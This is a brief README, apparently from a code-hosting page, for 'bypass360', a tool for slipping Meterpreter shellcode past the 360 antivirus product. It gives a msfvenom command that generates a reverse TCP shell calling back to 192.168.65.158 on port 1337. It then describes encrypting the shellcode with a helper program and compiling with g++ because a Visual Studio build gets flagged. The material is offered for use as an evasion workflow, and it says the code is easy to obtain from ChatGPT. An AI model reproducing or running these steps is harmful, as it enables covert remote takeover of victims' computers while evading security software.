Bypass360
bypass360
Install / Use
/learn @wxi3/Bypass360README
bypass360
-
生成shellcode:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.65.158 LPORT=1337 -f c
-
.\echoS.exe msf生成的shellcode 密码 shellcode的size
-
编译命令g++ -o 360.exe main.cpp lazy_importer.hpp
-
实现的代码很简单,问chatGPT即可
echoS也可自行编译
为啥要用g++?因为用vs2019会报毒

